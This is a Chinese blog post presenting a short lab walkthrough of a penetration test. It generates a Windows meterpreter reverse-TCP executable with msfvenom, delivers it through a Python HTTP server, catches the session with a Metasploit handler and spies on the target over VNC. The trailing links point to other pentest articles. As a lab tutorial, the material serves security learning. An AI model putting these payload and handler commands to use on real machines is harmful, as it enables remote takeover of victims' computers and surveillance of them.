一次简单的渗透测试

最新推荐文章于 2023-04-10 17:45:26 发布
最新推荐文章于 2023-04-10 17:45:26 发布
阅读量310 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunkaijie123/article/details/128547899
版权

一、环境

kali2022.4,靶机环境win10物联网企业版,工具:msfvenom、msfconsole、python3

二、具体步骤

1、管理员权限打开终端

2、生成可执行文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=指定端口 -f exe -o test.exe

3、在目标靶机下载生成的test.exe程序

1)在kali执行python3 -m http.server

2)在目标靶机进行下载

4、执行msfconsole命令

5、配置参数

use exploit/multi/handler(选择模块)

set payload windows/meterpreter/reverse_tcp(选择攻击模块)

set LhOST 本地ip

set lport 指定端口号

show options(查看配置的参数)

exploit -z -j(后台执行)

6、在靶机运行可执行程序test.exe

7、执行sessions查看上钩的用户

8、执行sessions -i 1进行攻击,出现meterpreter说明你就已经成功的入侵的对方的电脑

9、运行run vnc -i进行远程监控靶机

古道青阳
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
简单的练习渗透测试的方法(真的很简单
caption88的博客
12-01 1676
首先渗透测试就是传说的黑客选手。砸门现在开始教程(文中涉及很多下载链接,本人就是使用这个链接,所以我也不知道有没有中毒,不过既然要做这一行,砸门不是已经被黑就是在被黑的路上。所以没有关系啦) 第一步:虽然我们不能确定自己被没有被黑,或者我们安装的软件是否有毒的情况下,砸门先开一个保护的东西再说:比如360,或者电脑管家,或者知名公司旗下的产品。知名公司例如:知道创宇,360,绿盟等。我反正...
day09、1 - 简单渗透测试流程
Edimade的博客
05-08 1209
一、hacker的攻击基本流程(渗透测试流程)>二、渗透工具>三、渗透工具渗透原理>四、渗透攻击举例--IPC$>五、相关命令总结
第18节 简单渗透测试流程及实验
m0_64378913的博客
01-03 2378
本文章仅供教学研究使用,切莫在真实环境中试验。本节主要围绕网络渗透流程这一主题,从概述入手介绍扫描漏洞、暴力破解、445漏洞利用之IPC$、留后门等主要步骤,随后对每个步骤采用一个小实验进行讲解分析。
web调用exe_WEB安全渗透测试基础知识(八)
weixin_39848097的博客
12-12 230
3.5. 命令注入3.5.1. 简介命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。3.5.2. 常见危险函数3.5.2.1. PHPsystemexe...
一次曲折的渗透测试之旅1
08-03
在本文中,作者分享了一次具体的渗透测试经历,这是一次授权测试,即得到目标网站所有者的许可进行的测试。首先,进行了信息收集阶段,这是渗透测试的第一步。通过扫描子域名和端口,获取目标系统的基本信息。在这次...
safe3wvs渗透测试扫描工具
10-28
6. **持续监控**:安全不是一次性任务,safe3wvs可以设置定期扫描,持续监控网络环境的变化,确保及时发现新的安全风险。 7. **易用性**:"界面简洁、操作简单"意味着即使是对技术不太熟悉的人员也能快速上手,降低...
记一次不完整的渗透1
08-08
记一次不完整的渗透测试 本文将详细介绍一次渗透测试的过程,从目标选择到最终的提权过程。该测试的目标是一个理工大学的网站,使用 phpCMS 3.0 版本搭建。 首先,对目标进行了大致的踩点,查看网站的外观和结构。...
Python之渗透测试笔记(五) ——Requests模块
12-21
12. **流下载**:Requests提供了流下载功能,可以实现动态接收和处理响应内容,而无需一次性加载整个文件。 13. **连接超时**:可以设定请求的超时时间,防止因网络延迟导致的程序阻塞。 14. **分块请求支持 (....
渗透测试面试题_安全_
10-03
- **自动化测试**:支持批处理模式,可以一次性发送多个请求,这对于进行SQL注入或XSS跨站脚本等测试非常有用。 - **编码与解码**:内置多种编码和解码工具,如URL编码、Base64编码等,便于进行数据篡改测试。 - ...
渗透测试指南——工具
热门推荐
weixin_43526443的博客
11-05 6万+
——D&X安全实验室 工欲善其事,必先利其器。回到过去的旧时代,渗透测试是一件非常困难的事,并且需要大量的手动操作。然而如今,渗透测试工具是"安全军火库"中最常使用的装备,一整套的自动化测试工具似乎不仅改造了渗透测试人员,甚至还可以增强计算机的性能,进行比以往更全面的测试。 对渗透测试人员来说不用任何自动化工具对网站或者应用程序进行渗透测试是一件十分困难的事。因此选择一个正确的工具则变得尤为重要,正确的选择甚至占去了渗透测试成功的半壁江山。本篇文章就来和大家介绍一...
电脑桌面app客户端、微信公众号-小程序测试方法
希望我的博客,能帮上你解决学习中工作中所遇到的问题
04-10 1274
电脑桌面app客户端、微信公众号-小程序测试方法
Metasploit(MSF)渗透测试入门
2301_77147728的博客
03-29 945
MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程1、Auxiliary(辅助模块)为渗透测试信息搜集提供了大量的辅助模块支持2、Exploits(攻击模块)利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。3、Payload(攻击载荷模块)攻击成功后促使靶机运行的一段植入代码4、Post (后渗透攻击模块)收集更多信息或进一步访问被利用的目标系统5、Encoders(编码模块)
渗透测试常用方法总结
MzHeader的博客
06-19 1万+
1 渗透流程 信息收集 漏洞验证/漏洞攻击 提权,权限维持 日志清理 其他 1 信息收集 一般先运行端口扫描和漏洞扫描获取可以利用的漏洞。多利用搜索引擎 端口扫描 有授权的情况下直接使用 nmap 、msscan 、自己写py脚本等端口扫描工具直接获取开放的端口和获取服务端的 banner 信息。 使用 Python 端口扫描的介绍 https://thief.one/2018/05/17/1...
靶机 Hacknos:1
m0_51811529的博客
08-30 471
靶机1
在Linux中使用Python启动http服务详细攻略
Linux I Tell U
09-15 7673
前言 当你需要内建一个简单的WEB页面,又不想配置apache或者Nginx,并把需要共享的目录或者文件都以HTTP的方式展示出来。Python自带http服务,并且使用起来也非常简单。 一般Linux系统都是自带的Python的,Windows下则需要先安装python,所以你可以不费吹灰之力,快速解决这个问题。 下面所做的操作都是在Ubuntu20.04的环境上实现的 Python2启动方式 python -m SimpleHTTPServer 服务启动,默认端口为 8000 Python3启动方式
01-【python】python开启HTTP服务
qq_42303254的博客
10-27 293
https://www.cnblogs.com/orange777/p/10783499.html
靶场练习第二十五天~vulnhub靶场之Raven-2
qq_57976347的博客
02-18 1040
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A 192.168.101.128 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息 访问靶机网站,
Kali下使用一行python代码实现简易的http服务器
汗的博客
04-30 3248
比如我在kali的tmp目录下执行下列代码,就可以在当前目录开启一个http服务 python -m SimpleHTTPServer 然后就可以从另一台机器访问kali的ip下/tmp目录的内容,这样就可以传输文件等操作, ...
django项目实战之nweb渗透测试工具
最新发布
11-02
nweb渗透测试工具是一个基于Django框架开发的网络安全测试工具。该工具旨在帮助用户评估其网络应用程序的安全性,并识别潜在的漏洞和风险。 nweb渗透测试工具具有以下特点和功能: 1. 支持多种不同类型的渗透测试:nweb工具可以进行各种类型的渗透测试,包括漏洞扫描、身份验证测试、SQL注入测试、XSS测试、CSRF测试等。用户可以根据需求选择不同的测试类型进行安全评估。 2. 使用方便:nweb工具采用Web界面设计,使用起来非常方便。用户可以通过简单的操作和配置,启动渗透测试并查看测试结果。工具还提供了详细的报告,帮助用户了解测试过程和发现的安全问题。 3. 多个扫描器和工具的整合:nweb工具整合了多个知名的渗透测试扫描器和工具,如Nmap、OpenVAS、Burp Suite等。用户可以通过nweb工具一次性运行多个扫描器,并综合评估被测应用程序的安全性。 4. 自动化测试:nweb工具支持自动化测试,用户可以预设测试计划和任务,然后设定定时执行,实现定期的安全评估和漏洞扫描。自动化测试可以提高工作效率,并帮助用户及时发现新的安全问题和漏洞。 总之,nweb渗透测试工具是一款基于Django框架开发的网络安全测试工具,它提供了多种类型的渗透测试,使用方便,整合了多个知名扫描器和工具,并支持自动化测试。通过使用nweb工具,用户可以有效评估其网络应用程序的安全性,并及时发现和修复潜在的安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

古道青阳

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值